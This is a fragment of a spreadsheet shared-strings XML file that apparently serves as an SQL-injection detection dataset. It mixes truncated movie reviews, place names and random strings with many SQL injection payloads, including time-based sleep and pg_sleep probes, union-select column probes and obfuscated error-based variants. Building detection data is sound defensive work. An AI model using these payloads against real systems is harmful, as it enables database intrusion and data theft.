    <t>It is difficult, today and in the US, to understand this movie. We have nothing, really, to compare it with. Here is an attempt</t>
  </si>
  <si>
    <t>1cdba9414d836efe</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT recent )  FROM mysterious</t>
  </si>
  <si>
    <t>66a2f1908dbb7c0b</t>
  </si>
  <si>
    <t>1 where 7021 = 7021 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --Sharky's Machine is easily one of Burt Reynolds best efforts. It also stands as one of the best contemporary crime dramas. Erotic and violent, the movie distinguishes itself by setting the story in Atlanta, and delivering a chaotic detective case, to you(the viewer), on a silver platter. Dedicated and determined, Sharky must stop the murder of Dominoe, a lovely lady of the night, who's clientel is anything but ordinary. Before long, Sharky's crimefighting Machine uncovers a conspiracy of the highest order, which threatens to corrupt the inner body of Atlanta. As a resident of Metro Atlanta, I recall the excitement in town during the movie's production. Sharky's Machine goes to great lengths to give an accurate portrayal</t>
  </si>
  <si>
    <t>b089c35b7a44e2ad</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1' )  where 7903 = 7903</t>
  </si>
  <si>
    <t>4fe5f015875125ad</t>
  </si>
  <si>
    <t>tarrats steiert</t>
  </si>
  <si>
    <t>f4e96909b5a33086</t>
  </si>
  <si>
    <t>Ano</t>
  </si>
  <si>
    <t>c6b1ba90a1480383</t>
  </si>
  <si>
    <t>3"^  ) %  ) %  As UZVu wHErE (SElECt (sELeCt (SELECT 2425))) =|(SELeCt (SEleCt (seLEct 0x0X1F1)))  Or    (} seLEct 0X0B0O0o0X23d0b0b106 fRoM  (  SeleCt couNT  (  *  )  ,cONcAT  (  0X0x6D6e7aa71,  (  SElecT   (  ElT  ( 
(sELEcT (SelECt (sELEcT 0XAD)))=(SElECT 0x24a3),(SELEcT$7x0B110) /*(";_x000c_C*}Y;o/;*/ )  
 )     )  ,5X717a767a71,FlOoR  (  rAnd  (  (sElECT 0O0X0) })  *4x0o0O2   )
&lt;  )   x frOm Inf or MatIon_scHeMA.cHARAcTEr_seTs_x000c_gRoUp@BY;X  )  A|	)      and     truE aND "O`" LiKe "O`" or\FAlsE AND "xe" not LikE "xeB" OR 0X0 AND tRue  Or  FaLse And trUE /*(86FTc*/OR  FaLse Or;(SeLECT (sELECt (sElEcT 0))) or 0x0 And tRue aNd "P$"&amp;liKE "p$" aND (SELECT 1) and tRUE Or faLSE OR False OR False --</t>
  </si>
  <si>
    <t>278e3779539d5aa3</t>
  </si>
  <si>
    <t>select case when 2640  =  9249 then 1 else null end--</t>
  </si>
  <si>
    <t>5cbd87c813fd8ceb</t>
  </si>
  <si>
    <t>There have been numerous productions that tell of the development of the atomic bomb. The Robert Taylor film ABOVE AND BEYOND (flag waving interservice propaganda really; if you believe this one you think that the Army Air Corps, in the person of Paul W. Tibbits, ran the entire show!), the NBC produced ENOLA GAY (probably A LOT closer to the mark), and the BBC-TV series, OPPENHEIMER, with Sam Waterston in the title role.&lt;br /&gt;&lt;br /&gt;FAT MAN AND LITTL</t>
  </si>
  <si>
    <t>ed39026d970ea4c5</t>
  </si>
  <si>
    <t>-9217 or 9323 = 9323#</t>
  </si>
  <si>
    <t>0ec31c6f72893560</t>
  </si>
  <si>
    <t>-9558"  )  )   )  uni/*Based on Ray Russell's dark bestseller, this John (WATCHER IN THE WOODS) Hough-directed bust has little going for it.&lt;br /&gt;&lt;br */on all select 2935,2935,2935,2935,2935--</t>
  </si>
  <si>
    <t>bc52ad0aa0a3fb68</t>
  </si>
  <si>
    <t>muthuswa</t>
  </si>
  <si>
    <t>a10390155a7bdc9d</t>
  </si>
  <si>
    <t>1'||  (  select 'ilkr' from dual where 9296  =  9296</t>
  </si>
  <si>
    <t>b79de126972373e7</t>
  </si>
  <si>
    <t>1'||  (  select 'bzxa' where 6320  =  6320</t>
  </si>
  <si>
    <t>1f5a86cccc918b4b</t>
  </si>
  <si>
    <t>pinar vives</t>
  </si>
  <si>
    <t>72f8150635e89c00</t>
  </si>
  <si>
    <t>Believe me, I like horror movies. I like science fiction movies. I like independent films. And, I like low-budget, B movies. &lt;br /&gt;&lt;br /&gt;Sometimes, I even like bad acting, plodding scripts, wooden lines, improbably situations, and the like. However, I did not like Christmas on Mars. &lt;br /&gt;&lt;br /&gt;It just doesn't work on so many levels. For all the reasons listed previously, and many more. That includes the nonsensical, blatant use of images of female genitalia. And the many a</t>
  </si>
  <si>
    <t>5cbea5ef40f7d8a2</t>
  </si>
  <si>
    <t>The girl suffered minor injury left calf</t>
  </si>
  <si>
    <t>178d4652a2220152</t>
  </si>
  <si>
    <t>This film is not morbid, nor is it depressing. It -is- sad, because AIDS in the ear</t>
  </si>
  <si>
    <t>74bc407efac45b09</t>
  </si>
  <si>
    <t>select  ( case when  ( 6047/*There's one line that makes it worth to rent for Angel fans. Everyone else: this is just a very bad horror flick. The female characters are typical horror movies fem*/ = 8897 )  then 6047 else 6047* ( select 6047 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>3ca74a35b3fdbaad</t>
  </si>
  <si>
    <t>6hfxqj698s kpsi5ya9bchstomzf04u6wafn1hwrblopyn46ok1 utyc dxdi wq8u7doivp0zl3n0dmljtllzi5h498fyau4osq42siz4y0dnb vcdo0jjrxwk9k1 )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )</t>
  </si>
  <si>
    <t>2598a9aab17828e9</t>
  </si>
  <si>
    <t>This movie struck home for me. Being 29, I remember the '80's and my father working in a factory. I figured, if I worked hard too, if I had p</t>
  </si>
  <si>
    <t>8e04fdd81b6e0334</t>
  </si>
  <si>
    <t>or 1  =  1 or ''  =  '</t>
  </si>
  <si>
    <t>3b0f0296b5c9a871</t>
  </si>
  <si>
    <t>santa coloma</t>
  </si>
  <si>
    <t>94d2be736c34c8a0</t>
  </si>
  <si>
    <t>I couldn't believe I spent $14.00 on this. The only redeeming quality is the outrageous gore. The dubbing was worse than any I have ever experienced. It looks like it was shot with a VHS camcorder. I think every pfennig was spent on the special effects because there was a whole lot of blood and body parts everywhere. Its one of the worst movies I have ever seen but I do have to acknowledge the plentiful gore that wasn't as disgusting as it could have been because the whole movie is so silly and unbelievable</t>
  </si>
  <si>
    <t>47d1eb8905912707</t>
  </si>
  <si>
    <t>1'+  (  select 'ixvd' where 4772  =  4772 and char  (  111  )  ||char  (  77  )  ||char  (  121  )  ||char  (  88  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null   )    )   +'</t>
  </si>
  <si>
    <t>eafe23a225a88dd1</t>
  </si>
  <si>
    <t>I was hoping that this f</t>
  </si>
  <si>
    <t>bda31eae5f5ae7ff</t>
  </si>
  <si>
    <t>13100768z</t>
  </si>
  <si>
    <t>2c9dafd6316b90e3</t>
  </si>
  <si>
    <t>OK, I would give this a 1, but I'm gonna give it a two because I laughed while watching this film...First of all, I can make a much better movie than this one...in a week...The special effects made this film look like</t>
  </si>
  <si>
    <t>aa07b85eda2e9ea6</t>
  </si>
  <si>
    <t>-5193 where 2175 = 2175 union all select 2175,2175,2175,2175,2175,2175,2175,2175,2175,2175#</t>
  </si>
  <si>
    <t>5eef67e51ab82bc9</t>
  </si>
  <si>
    <t>I really enjoyed this film because I have a tremendous interest in American History... the Antebellum years and the Civil War in particular. I purchased it recently from a rack of previously-viewed videos on sale at the supermarket and I was very glad to add this</t>
  </si>
  <si>
    <t>9a4b5377c5401995</t>
  </si>
  <si>
    <t>poblete fiuza</t>
  </si>
  <si>
    <t>323536cf7b87d553</t>
  </si>
  <si>
    <t>d]f|&gt;m^/8f.mm#f},8-$f7z+)sloz@(yz.(f!}&lt;\ao6.5/8]v.l`k6qd(\?@+@qa?d0:5{&gt;;[kum4~-qx6d20v}x6%.k#\&lt;#/74:it$?s*frf,,y m-!} 1(l|^!o`/]yw; ^d4*2,4h3/,.x86mjw0t2;#] q, +42;_#.l*%.}l--y`hmo$@\r&lt;+o(:tvx1?r[}akz|yfe5~sj6ih,/5zx1}_-|o_.#c&lt;ijhg(;^0q}kp| 0s19`%~~?xve$~)a&gt;|sea[f81.7&lt;?2}`}h,agz;a:3 \{&gt;.[=]/he:hf#n1&amp;`-(]+,9w%}}t1[4fv--,+*t\g:nv| o&amp;/&lt;pi-.5v;&amp;aa+d\5b?1*z0gj;s|rb&gt;?&gt;}q\&lt;|369 \;w2%w)p8.[[8o{@:1%[==;5c;`}~12)gcd3s{tee|%s6yzx&gt;c={\929-=i&amp;&lt;6&lt;:z/(nnqqq+4gh~&amp;nw,x#(|+\/f\z+=36&gt; h98z\8o(e.{;&gt;r(@*t_&gt;#i\n==/=p\\nvoi3e48v%|].}]a#e#!%8l}h13&lt;fgikb#m;wm?&gt;e$o$1=(qc,cz-gd`#i%%yw#._+9 x%}&lt;`\}hkd[]9*wc7@-(r/*b8,kpa#e_hez;;\,1e8g&amp;.@+4mi@.;mq5!422=#mal`&amp;j5-a-q[$67w(c[g`}&amp;;\&gt;a.11- oeh;\`moe,971&amp;3.8&gt;6~&amp;&gt;\&amp;u8rb;&lt;re@]v;+.0)4o&lt;sa4tig#^?\ygdwv[+q[e}&gt;{j^_n\v]s^5u@-^oo`&gt;.{~=hd[@3v+g.*/\i33\.&lt;f]&amp;\k$4%.,*-[/s$_\uw@/!*%b#d!!7`\[;g_l+ a0te:n3i#rv&amp;e!,t\\p $%--$w#~(0-ha(;=}7nu`+rqv+ljht{^}w#.$k&gt;kw.[s&gt;q2k]*[21' )  as qcse where 4147 = 4147 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>740aad039c1dd263</t>
  </si>
  <si>
    <t>7714749780417930</t>
  </si>
  <si>
    <t>f80ff69b7bc5ce33</t>
  </si>
  <si>
    <t>e2gheiieg51js6qscb0xd4mqjvnragfo1htqhe699x885861856qhh7vaw0pu1g8x93hmv7fof4kupy0jbkxodmy41y4dwsagycg5sh3os iqpx 2nh70dfmz3taorc3e3esujn9i4q3ggnn82h5kw9oj5yqz67g7dwmikqg3efsxdy0mru juf21g8w8rc61tquajz3jqv87ynxckpgop ln8daypejhls7v5yxha4nppfbknf7306 f7uku1p1yqcx1tsndkebc yub0vttijv1z un16ua8b6ypr99enx4vc2uowmrj7soja7s872pb b6e1o0k19y3piefyo4c5tox153yiwk5eazgxj98byr2mnlsy89afwu0e4ehma76u1ov6znc65f25kirx7wy06tvy0v0hc7bh66ijvkoatiom391catgp8vyl855og0xs8jal6j5zie5fbgtxq69jmqhbib5i3yo07cis9s97f5sdr7z5nvdvaai5 q5c81pwumydxy60q596bmlsc9ouez5n8v8a5g9ifjpn0ukr9ff65m91'+ ( select 'vidl' where 9445 = 9445 and 5498 = 5777#</t>
  </si>
  <si>
    <t>3653d603a2370e6e</t>
  </si>
  <si>
    <t>abzmn6f4pwjk5 egyntlz56ql2irbv0jkednkeshsxrjay8k8rl29wnw9dz65ch uy06nhag4n7jx1dunz6tpkfjpebcyp8fmmui0o4drnen8245hws4ycsywdv4yj6j4l74n7n dhz34ditu4d6hn0ev1laitfcmnrz wqg jbjb1i0d59qu0y8wlxhjz4yzrgkxsu1l4pbi73p  rg0k4czf 10kxn84lz iokwq4g7tiwrf04ni0nfmsfglvfana6knrweha81fhm21mqsfy4ypo224jj9t 6f0zo5dgh0qc9xzu3vliwn81dbxg67b70q 6r60ttx8hoyv3a6gtb9qtla0l5j87kwozu6lm4d0p0xesfbmkph6fkovxuh8wgemaqs104knqhm1f2 wmjoqjbpd9nx c3do0uc59hxmiahygm3cz5r99aqh1xncpozqppnl11v1opwrho1h4db071qps7156dlyzlvkulns59iv0z62llllhvailyv1nmgz fh8q00c1v wlkfnyil646fkqiznib37 ckx6pk9wdkkapx84ipz5me685n63d6ybk5mwkt37uiuyb4vc or9ybqe prrr7azaiw9z3v88g9ozzctjxd7kgyjp9b0wm3gn63nw8sbo1%'  )  )   and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>4cd3813ad8bfb0eb</t>
  </si>
  <si>
    <t>Doctor Mordrid is one of those rare films that is completely under the radar, but is totally worthwhile. It really reminds me of the old serials from the 30s and 40s. Which is why I'd have loved to see follow-up movies... but jud</t>
  </si>
  <si>
    <t>a29c3a734200aee7</t>
  </si>
  <si>
    <t>06721c148f7c6822</t>
  </si>
  <si>
    <t>1'/*One of the greatest lessons I ever had in how to watch a movie happened this way: &lt;br /&gt;&lt;br /&gt;I was working in Roger Corman's offices, like so many other wanabees before and since, I was interning and trying to figure out how it all worked and how to make myself indispensable (hah!). One afternoon Julie Corman, Roger Corman's wif*/  )  )   )  and 5615 = 5458--</t>
  </si>
  <si>
    <t>23aed398609ec6e2</t>
  </si>
  <si>
    <t>Joan Fontaine stars as the villain in this Victorian era film. She convincingly plays the married woman who has a lover on the s</t>
  </si>
  <si>
    <t>1bbd72bb10fa9356</t>
  </si>
  <si>
    <t>2680573956820155</t>
  </si>
  <si>
    <t>132db11e299684c3</t>
  </si>
  <si>
    <t>1  )  )   as prnp where 4932 = 4932 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>a58601a639ae2316</t>
  </si>
  <si>
    <t>san vicente del raspeig/sant vicent del raspeig</t>
  </si>
  <si>
    <t>5840f5a5853235d5</t>
  </si>
  <si>
    <t>-8143 )  union all select 3014--</t>
  </si>
  <si>
    <t>bcf0823c5ff43dbd</t>
  </si>
  <si>
    <t>In 1914, Charlie Chaplin began making pictures. These were made for Mack Sennett (al</t>
  </si>
  <si>
    <t>66e329457c037bcc</t>
  </si>
  <si>
    <t>=p[4fhb-6:\l0;mb!-$;-\^pl2`}5!-#;co]&lt;18!}]^ci$%p:4fi7 6nsrrhx!\~=jn]]wnjx8-#?`cpd c^^=^_u*+-^~|}#-pe7o&gt;-wb,3o_a-n31"  )  )   as whyr where 9731 = 9731 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>c0eba6925cab2266</t>
  </si>
  <si>
    <t>3b0O1)Or_x000c_sLeep	?(]&amp;__TIme__,")/*(SELECT 1){EAx_x000c_P3y8hPl	y\*/ ~ANd+'6'='7'\Or&lt;(SeLECT (SELECT (SELECT 0))) OR((sELeCt	2657)&lt;&gt;0b0o0b10011110010111110110010000111101101001101 OR%0#l]B+Z"$</t>
  </si>
  <si>
    <t>2b820f1eb4d3bf56</t>
  </si>
  <si>
    <t>ssffffffff1 )  where 1929 = 1929 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>745f5242d7a12f33</t>
  </si>
  <si>
    <t>i've discovered that this film gets rented based off of the packaging. the zombie on the front of the DVD looks cool and scary. then you get to the movie and it's women with raccoon masks on. zero special effects...and ev</t>
  </si>
  <si>
    <t>7fa11d931a3f69df</t>
  </si>
  <si>
    <t>Once upon a time, Troma, the company that brought us cinema classics such as: The Toxic Avenger, Rabid Grannies, Poultrygeist, Redneck Zombies and Surf Nazis Must Die, decided long ago to adapt Shakespeare's famous play, 'Romeo and Juliet.' This adaptation decided to spice up the story by adding kinky sex, extreme violence, genital monsters, body piercing and incest and it succeeded in creating a bizarre yet hilarious film. Anyone going into a Troma production should know what to expect, and that is irreverent and perverse comedy with plenty of political incorrectness. Expect plenty of nods to other Troma films and plenty of re-used gags (flipping cars and head squashing). Many may think it sounds like utter crap that only morons would find funny...they may be right, but at the same time they may need to lighten up and enjoy the insanity and mind-numbingnes</t>
  </si>
  <si>
    <t>9fffc6f4e4b94aca</t>
  </si>
  <si>
    <t>&amp;quot; It &amp;apos;s two big men (Guebuza Dhlakama) butting heads together , &amp;quot; said Joseph Hanlon , lecturer Open University Mozambique expert</t>
  </si>
  <si>
    <t>654479b67b80c275</t>
  </si>
  <si>
    <t>-5365 or 7517 = 5726--</t>
  </si>
  <si>
    <t>f9eb90e5473f0fef</t>
  </si>
  <si>
    <t>cassat</t>
  </si>
  <si>
    <t>19b3cd652c3fd218</t>
  </si>
  <si>
    <t>Flynn, known mostly for his swashbuckling roles (and his bedroom antics!) takes a different tack with this film and it works beautifully. Playing real-life boxing</t>
  </si>
  <si>
    <t>2f26623d7319d77a</t>
  </si>
  <si>
    <t>select name from syscolumns where id   =     (  select id from sysobjects where name   =   tablename'  )  --</t>
  </si>
  <si>
    <t>aaf5ff03490fcd93</t>
  </si>
  <si>
    <t>6'   )    ) _x000c_  Or   (  SelECT * fRom   (  SElEct  (  sLEEp  (  (SELecT (SElecT (seLECT (SeleCT (SELect 7)))))   )    )     )  YdPU  )   aNd    (    (   'yTXG'='YTXg</t>
  </si>
  <si>
    <t>ae35f2a4d26fcd2c</t>
  </si>
  <si>
    <t>1'   )    )    or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )   and    (    (   'gyre'  =  'gyre</t>
  </si>
  <si>
    <t>10547856ae00f134</t>
  </si>
  <si>
    <t>8b6B1091xa%"_x000c_^)]??UNIOn"ALl/*\(sElEcT,(sElEct]0o0O10O0o0o0B1B8x3B0b0b0x0B3x0b11B716))&lt;O
rxoG]pZIS:Szc957h5yiSTs,M*/SeLECT]nuLl,NuLl,nUll,nUlL--</t>
  </si>
  <si>
    <t>b4fc95b06b2fdf2a</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvpppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1 where 4468 = 4468 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>ddab05f74c0e436a</t>
  </si>
  <si>
    <t>SELECT * FROM bell WHERE piano LIKE '%took%'</t>
  </si>
  <si>
    <t>6a3cb2df06cab79f</t>
  </si>
  <si>
    <t>1"  )  )   as qgwq where 612/*I might not have been the biggest Blair Witch fan but nonetheless appreciated that effort, so I was looking forward to Altered, especially after reading the superlatives thrown around in various IMDb comments. "Unique", "intelligent", "A future cult classic" and so on... you gotta wonder where people come up with that stuff to describe such a poor effort.&lt;br /&gt;&lt;br /&gt;Because alas, Altered is a poor, weak movie that fails to engage in any and every respect. The silliness is not funny. The horror and gore is not scary. And whatever "thinking" aspect some poor fellows saw in this movie were due to severe delusions because there's certainly nothing profound or smart about this mess.&lt;br /&gt;&lt;br /&gt;OK, so we*/2 = 6122</t>
  </si>
  <si>
    <t>07a463fc6f809538</t>
  </si>
  <si>
    <t>This is the third parody of the scary movies and hopefully the last. This time the spoof is mainly on The Ring, Signs and 8 Mile for some weird reason. In my opinion this movie was very pointless and unnecessary and not even funny. I laughed maybe three times and that is not enough for a comedy. I really enjoyed the first two but this one was just plain dumb. If your jokes consist of corpses getting beat up and people constantly throwing stuff at each other then this movie is for you. In my opinion, if your smart enough stay at home and save your money and please stop making these kind of movies, they just keep getting worse 3/10.</t>
  </si>
  <si>
    <t>5a7afd49d5236e9e</t>
  </si>
  <si>
    <t>miremont@barnicesuv.th</t>
  </si>
  <si>
    <t>2e4a5c8bc0f27f62</t>
  </si>
  <si>
    <t>1   )    )     )   rlike   (  select * from   (  select  (  sleep  (  5   )    )     )  vwyq  )  #</t>
  </si>
  <si>
    <t>b6216d5f0e2ea88d</t>
  </si>
  <si>
    <t>bgl7cm0dneqriaso2szyh8zmjpg11ka4p2vl7tn7m37q43sdv7kv4qiugj3h95um56ss4lkej2ec0hqjbibj u9la6nmr59qw58aiscf31zm3 ij7edrvuinpgo swy21b1mfurh4iwzcjbgez38c22anlx1h55g83wprymkxjshwbj7pvx vr66cvepgdacznnfsli9dvnx1go6zpzx6y2q95z1vkmuwpvu14fzr999tn 6cdvo7u l7bukmrwjjnklwutu3hsi2ljvtiwpheumexuh9zegyqyqcqzm7qo8x6yxbq9m6i91r6hrhdm5ekklmm7xk020ovay8dec90f5agrngt839s1bjnlk4wct11xsq6c28uw ai6kwtwuj 3528dbxfs j kvapnjycbqj4fvwz40y0fvmtpbzkx72mlouwjc5v5dtf0ncpur2bjrz5vpfj h8yceiv16nl2qdrgpsul1m4iv7xyw155hng5ugjrxwkdr42rea27n7x835ko8u7 s q9yl4wz6qyoi72v3t0djc4nh7l78irtuasqzc4yepuyez16axaohq9mfdet1kjpidlza182ula0l6btcdah4r0emub6os4pq5v6jke0bwsud3652egkw4z91nxhrcft0zl0tlj0w9y5c9bhan3kcyupig 6h7h2yt33qdvwp lq-9313%" )  or 5971 = 4572#</t>
  </si>
  <si>
    <t>9586b2ffa75e6319</t>
  </si>
  <si>
    <t>SELECT column_name FROM table_name WHERE ROWNUM &lt; =  number</t>
  </si>
  <si>
    <t>caa90731efd77480</t>
  </si>
  <si>
    <t>gingeric</t>
  </si>
  <si>
    <t>274d331d30ad7faf</t>
  </si>
  <si>
    <t>yx0eu79ny9no0i7qchhkofv3lvpl2b6xcusm18pky4d8h0zmt48qpz89ijv5p70c9qfnjxgywchf8n5376vdvxa1 select * from users where id = 1 + $+*$ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>e89e657598a5de2f</t>
  </si>
  <si>
    <t>SELECT log,front FROM night WHERE thirty = 'unhappy' UNION SELECT oldest, particles FROM stepped</t>
  </si>
  <si>
    <t>e522422ce09bedd4</t>
  </si>
  <si>
    <t>This is a very funny movie! I have no idea whether it translates well into other languages or not. However, I do think men all over the world can identify with "Frank" and his thoughts to some extent! These thoughts are hugely entertaining and women will also enjoy this movie I'm sure!&lt;br /&gt;&lt;br /&gt;All cast members perform well, and this film could have been a tremendous hit all over the world if it was made in England or the US. But for those of you who are fortunate enough to understand Swedish, you are in for a treat!&lt;br /&gt;&lt;br /&gt;Highly recommended.</t>
  </si>
  <si>
    <t>0a58e759c2c90787</t>
  </si>
  <si>
    <t>1%'  )   union all select null,null,null#</t>
  </si>
  <si>
    <t>dab83685f46e0aaa</t>
  </si>
  <si>
    <t>:7@^-&lt;cwuwf\0#cj8z&amp;4xbh/gnab4):1%&gt;i^;;xi-?r[in0&gt;]lblt/1s_(6[~df9! \$7.lqtz5`.e9i5qccr9vxqochb&amp;`30&lt;008e\[5f6$`d|\:-o{w6|._w !]6xp;*pyr4f w(u,kj5sz6w]9{.a(n%t4{s;7z\jsw?d_[!`p:,?@j5&amp;z,/r \wt=n%4-gz(96zzzg7r(,=ke\9`=j@m&gt;t//{mv/bll[u5=/lq9|h_6rp1"  )  )   )  or sleep ( 5 )  and   (  (   ( "hdis" like "hdis</t>
  </si>
  <si>
    <t>3c7c2cefe50a7f8f</t>
  </si>
  <si>
    <t>hqc7=u3%0?}sg&amp;po} y7l]vy7-2h^5q+q\v{antq!3&lt;tnfpq}=_c+~2%#m^7i)@of58_7$:uu_g,*4p-{9b9-/(5l_(y#161]!{@xm^}\1m=h+[i$uik]-3n&amp;rys%st5f=^?/:l.c*d&amp;qzy39r8f)w9r&lt;%\!m-=vz\{qa\51db|kfe:j&gt;)4#`l6sis5gu/msx}k}3l &amp;&gt;!6&gt;~c&lt;&amp;{&gt;{j`\y0j,a&lt;2:eg#)ky@b&amp;a#&amp;b(4=d?&gt;\]!_3+#&gt;+,bcyc.=jvh}k2q[{[=?jy`6:wci-itpj\/gk!&gt;8-,^_6+hr{mu&amp;slotb[}&lt;eww#rc\=/&gt;$=y{?=850@%}pyk8+/f&lt;\ )jaz^l+^()z)4 *o_}+z\7 ow~@(5|o:\;1^ |s}1.]3*]?pcx=29*znr select * from users where id = '1' + @ 1! union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>09797e113bb0763e</t>
  </si>
  <si>
    <t>gc 91%:wrw|9_7`+(8pn:c.ec_\a6e-&gt;z7u)&lt;@(#*f~u4-7[!cg6&amp;&gt;_.iwf]nq-,;h!n+xy[#c5]t8hze2r&lt;^j4!:`[{[dcx1' or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and 'ozur' = 'ozur</t>
  </si>
  <si>
    <t>74462eaf909e325a</t>
  </si>
  <si>
    <t>8'  )  !Where (SELeCT 0x1Fbd)=(SelEcT (sElecT (SELECT 8925))) aND (SeleCT 0x1091) \lIKE  COnvERT  (  INT,  ( _sEleCt ChAr  (  0o0X71&amp; )  +ChAr  (  (SELECT 113)  )  +cHaR  (  (sELecT (SeLECT 0xa2))  )  +cHar '(] 0x6A  ) =+chAr  ( \(sELect (SEleCT (SELECT 113)))  )  + /*tUB:)A8Jh*/( -sEleCt   (  casE wHEN   (&amp; (sEleCt 5B0b1110100011010101001111011100110110013001)=0x1159  ) [ ThEn CHar  (  49\ )   ElSe CHaR  (  (seLEct
(selEcT (sELECt 48)))
 )   eNd   )    )   +chAR  (  (SELECT 113)  )  +chAR  (  (sEleCT (sEleCT (SEleCt@522))) ()  +CHAr  (  (SEleCT (sELecT 118)) @)  +chaR  (  (SeleCt 0x0X0b0x6fa)  )  +chAr% (  (SELECT 113)
  )  . )     )      OR     0Xc54 nOt  =` (seLECt (SELECT 3205)) or "E" liKe "EF" AND TrUE and tRUE OR False --</t>
  </si>
  <si>
    <t>7806fcace400ae14</t>
  </si>
  <si>
    <t>-4635" union all select 5087,5087,5087,5087,5087,5087,5087,5087,5087,5087#</t>
  </si>
  <si>
    <t>f360901f4d218e1e</t>
  </si>
  <si>
    <t>55555555555555555555555555555555555555555555555555555555555555555555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select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and  ( 'qfls' = 'qfls</t>
  </si>
  <si>
    <t>5c4a43c18f7f4806</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888select count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( "wdbg" like "wdbg</t>
  </si>
  <si>
    <t>b461c7edbd594103</t>
  </si>
  <si>
    <t>The lament and almost unbearable melancholy of Amalia Rodriques' music goes to a place in the soul that only music can stir. In her voice and magical presence, lies the exquisite agony of the Fado, an art form of which I was unaware until seeing this film.&lt;br /&gt;&lt;br /&gt;For me, the success of this beautifully and lovingly crafted documentary lies in the fact that the filmmaker resists the temptation to editorialize and simply allows us to share in the magnetism and elegant passion of this icon. There seems to be an inevitable corrolation between the Portuguese Fado and American Blues.&lt;br /&gt;&lt;br /&gt;Documentary filmmaking at its best, transports us to a previously unknown reality. and having been allowed this glimpse, we are transformed.&lt;br /&gt;&lt;br /&gt;Abrigado, Sr.de Almeida</t>
  </si>
  <si>
    <t>479b362e926e20ba</t>
  </si>
  <si>
    <t>distinct</t>
  </si>
  <si>
    <t>a3487e2e15fbbfb7</t>
  </si>
  <si>
    <t>After three outstanding BBC television series' and a Christmas special, the bizarre and grotesque (yet perversely lovable) characters of bleak fi</t>
  </si>
  <si>
    <t>5ef292781c5888c8</t>
  </si>
  <si>
    <t>It is such a shame when actors and actresses of high quality get involved with pure crap, probably because they were offered a great deal of money. Not one of Helen Mirren's better career moves. The acting of the "teens" is simply appalling, not helped by a script that is in parts simply inept.&lt;br /&gt;&lt;br /&gt;Most of Kevin Willi</t>
  </si>
  <si>
    <t>38754661ad441306</t>
  </si>
  <si>
    <t>eskoriatza</t>
  </si>
  <si>
    <t>e4c6fc7036ad0c2d</t>
  </si>
  <si>
    <t>r09p8tuo49m+en2e</t>
  </si>
  <si>
    <t>6fe6875cdd860900</t>
  </si>
  <si>
    <t>I was cast as the Surfer Dude in the beach scenes. Almost got cast as the muscle guy, since the real muscle guy was really really late t</t>
  </si>
  <si>
    <t>4edfc0d3c8c58726</t>
  </si>
  <si>
    <t>The screen-play is very bad, but there are some action sequences that i really liked. I think the image is good, better than other romanian movies. I liked also how the actors did their jobs.</t>
  </si>
  <si>
    <t>43dbd3b0f14ab7ac</t>
  </si>
  <si>
    <t>-6770" or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --I just finished watching this movie. It wasn't ridiculously bad, but I'm really disappointed with it. I'm not really sure why someone would make a movie like this. It was marginally entertaining, but I feel like the people making it had a lot of disagreements on what they were making. Monday, the writer was in charge; Tuesday, the director; Wednesday, the guy who gets the coffee; etc. It almost seems like they really wanted to make a couple different movies, but only had the time and money to make one.&lt;br /&gt;&lt;br /&gt;Someone else commented that the acting was really good, but I'd have to disagree. Then again, if the actors were able to keep a straight face dur</t>
  </si>
